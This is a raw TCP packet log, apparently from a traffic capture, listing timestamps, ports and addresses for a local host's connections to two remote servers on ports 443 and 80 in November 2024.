                                                                            Nov 26, 2024 09:44:29.704955101 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.708475113 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.708535910 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.708543062 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.711973906 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.712044954 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.712054014 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.716772079 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.716845036 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.716856956 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.720848083 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.720912933 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:29.720925093 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.724224091 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:29.724298000 CET49731443192.168.2.4193.30.119.205
Nov 26, 2024 09:44:29.724308014 CET  443  49731  193.30.119.205  192.168.2.4
Nov 26, 2024 09:44:29.727874041 CET  443  49731  193.30.119.205  192.168.2.4
Nov 26, 2024 09:44:29.727961063 CET  49731  443  192.168.2.4  193.30.119.205
Nov 26, 2024 09:44:29.727978945 CET  443  49731  193.30.119.205  192.168.2.4
Nov 26, 2024 09:44:29.732430935 CET  443  49731  193.30.119.205  192.168.2.4
Nov 26, 2024 09:44:29.732510090 CET  49731  443  192.168.2.4  193.30.119.205
Nov 26, 2024 09:44:29.732532024 CET  443  49731  193.30.119.205  192.168.2.4
Nov 26, 2024 09:44:29.736080885 CET  443  49731  193.30.119.205  192.168.2.4
Nov 26, 2024 09:44:29.736141920 CET  49731  443  192.168.2.4  193.30.119.205
Nov 26, 2024 09:44:29.736159086 CET  443  49731  193.30.119.205  192.168.2.4
Nov 26, 2024 09:44:29.739645958 CET  443  49731  193.30.119.205  192.168.2.4
Nov 26, 2024 09:44:29.739708900 CET  49731  443  192.168.2.4  193.30.119.205
Nov 26, 2024 09:44:29.739731073 CET  443  49731  193.30.119.205  192.168.2.4
Nov 26, 2024 09:44:29.792797089 CET  49731  443  192.168.2.4  193.30.119.205
Nov 26, 2024 09:44:29.882664919 CET  443  49731  193.30.119.205  192.168.2.4
Nov 26, 2024 09:44:29.882678032 CET  443  49731  193.30.119.205  192.168.2.4
Nov 26, 2024 09:44:29.882946968 CET  49731  443  192.168.2.4  193.30.119.205
Nov 26, 2024 09:44:29.882983923 CET  443  49731  193.30.119.205  192.168.2.4
Nov 26, 2024 09:44:29.886151075 CET  443  49731  193.30.119.205  192.168.2.4
Nov 26, 2024 09:44:29.886236906 CET  49731  443  192.168.2.4  193.30.119.205
Nov 26, 2024 09:44:29.886259079 CET  443  49731  193.30.119.205  192.168.2.4
Nov 26, 2024 09:44:29.889671087 CET  443  49731  193.30.119.205  192.168.2.4
Nov 26, 2024 09:44:29.889754057 CET  49731  443  192.168.2.4  193.30.119.205
Nov 26, 2024 09:44:29.889775038 CET  443  49731  193.30.119.205  192.168.2.4
Nov 26, 2024 09:44:29.894309044 CET  443  49731  193.30.119.205  192.168.2.4
Nov 26, 2024 09:44:29.894391060 CET  49731  443  192.168.2.4  193.30.119.205
Nov 26, 2024 09:44:29.894412041 CET  443  49731  193.30.119.205  192.168.2.4
Nov 26, 2024 09:44:29.897986889 CET  443  49731  193.30.119.205  192.168.2.4
Nov 26, 2024 09:44:29.898077011 CET  49731  443  192.168.2.4  193.30.119.205
Nov 26, 2024 09:44:29.898103952 CET  443  49731  193.30.119.205  192.168.2.4
Nov 26, 2024 09:44:29.901537895 CET  443  49731  193.30.119.205  192.168.2.4
Nov 26, 2024 09:44:29.901623011 CET  49731  443  192.168.2.4  193.30.119.205
Nov 26, 2024 09:44:29.901633978 CET  443  49731  193.30.119.205  192.168.2.4
Nov 26, 2024 09:44:29.901690960 CET  49731  443  192.168.2.4  193.30.119.205
Nov 26, 2024 09:44:29.905452013 CET  49731  443  192.168.2.4  193.30.119.205
Nov 26, 2024 09:44:45.239092112 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:45.359564066 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:45.359776974 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:45.359901905 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:45.479937077 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.520169020 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.520195007 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.520209074 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.520221949 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.520241976 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.520253897 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.520267010 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.520303965 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.520311117 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.520315886 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.520328999 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.520417929 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.641349077 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.641392946 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.641511917 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.721429110 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.721448898 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.721707106 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.725502014 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.727046967 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.727108955 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.727140903 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.735512972 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.735595942 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.735613108 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.744009972 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.744040966 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.744103909 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.752851009 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.752918959 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.753015041 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.760911942 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.760953903 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.760993004 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.769263029 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.769344091 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.769464016 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.777674913 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.777801991 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.777810097 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.786175966 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.786271095 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.786320925 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.794559002 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.794648886 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.794730902 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.803118944 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.803205013 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.922728062 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.922772884 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.922943115 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.924190998 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.924217939 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.924293995 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.929605961 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.929655075 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.929745913 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.933926105 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.933984995 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.934051037 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.939413071 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.939430952 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.939508915 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.944277048 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.944329023 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.944434881 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.949445009 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.949553967 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.949696064 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.955074072 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.955209970 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.955301046 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.960611105 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.960633993 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.960724115 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.964965105 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.965174913 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.965266943 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.970192909 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.970223904 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.970290899 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.975327969 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.975415945 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.975502968 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.980722904 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.980853081 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.980956078 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.985670090 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.985930920 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.986027956 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.990890026 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.991054058 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.991113901 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:46.996062040 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.996154070 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:46.996191978 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.001271963 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.001348019 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.001405954 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.006323099 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.006618023 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.006683111 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.011511087 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.011542082 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.011957884 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.016901016 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.016913891 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.016968012 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.021914959 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.021992922 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.022041082 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.124633074 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.124655008 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.124830008 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.126305103 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.126437902 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.126499891 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.130569935 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.130585909 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.130640030 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.134803057 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.134814024 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.134886980 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.138712883 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.138726950 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.138828039 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.142683983 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.142733097 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.142860889 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.147305012 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.147466898 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.147557974 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.150425911 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.150496960 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.150578022 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.153778076 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.153841972 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.153929949 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.157505989 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.157653093 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.157737970 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.161073923 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.161246061 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.161325932 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.164835930 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.164864063 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.164966106 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.168389082 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.168430090 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.168503046 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.171964884 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.172100067 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.172432899 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.175669909 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.175789118 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.175885916 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.179641008 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.179673910 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.179750919 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.182988882 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.183007002 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.183058023 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.186681986 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.186759949 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.186815977 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.190280914 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.190560102 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.190625906 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.193919897 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.194013119 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.194062948 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.198055029 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.198287964 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.198345900 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.201519012 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.201533079 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.201598883 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.204853058 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.204955101 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.205163956 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.208631039 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.208647966 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.208698988 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.212172985 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.212317944 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.212384939 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.216063976 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.216183901 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.216247082 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.219439030 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.219518900 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.219600916 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.224071026 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.224087000 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.224200964 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.325551033 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.325638056 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.325794935 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.326913118 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.327018976 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.327068090 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.329701900 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.329972029 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.330033064 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.332421064 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.332603931 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.332667112 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.335308075 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.335326910 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.335378885 CET  49738  80  192.168.2.4  104.168.46.26
Nov 26, 2024 09:44:47.338095903 CET  80  49738  104.168.46.26  192.168.2.4
Nov 26, 2024 09:44:47.338108063 CET  80  49738  104.168.46.26  192.168.2.4
                                                                            Nov 26, 2024 09:44:47.338166952 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.340584993 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.340728045 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.340816021 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.343307018 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.343384027 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.343467951 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.345992088 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.346055031 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.346144915 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.348473072 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.348594904 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.348673105 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.351023912 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.351089954 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.351170063 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.353661060 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.353898048 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.353981018 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.356089115 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.356182098 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.356252909 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.358601093 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.358675003 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.358752966 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.361164093 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.361299038 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.361373901 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.363653898 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.363739014 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.363823891 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.366174936 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.366276026 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.366360903 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.368827105 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.369080067 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.369168997 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.371278048 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.371294975 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.371393919 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.374022961 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.374243975 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.374317884 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.376606941 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.376638889 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.376753092 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.379616976 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.379628897 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.379724979 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.381504059 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.381515026 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.381598949 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.384095907 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.384108067 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.384270906 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.386395931 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.386576891 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.386688948 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.388902903 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.388998032 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.389072895 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.391470909 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.391541004 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.391613007 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.393907070 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.394038916 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.394128084 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.396526098 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.396595955 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.396687031 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.398961067 CET8049738104.168.46.26192.168.2.4
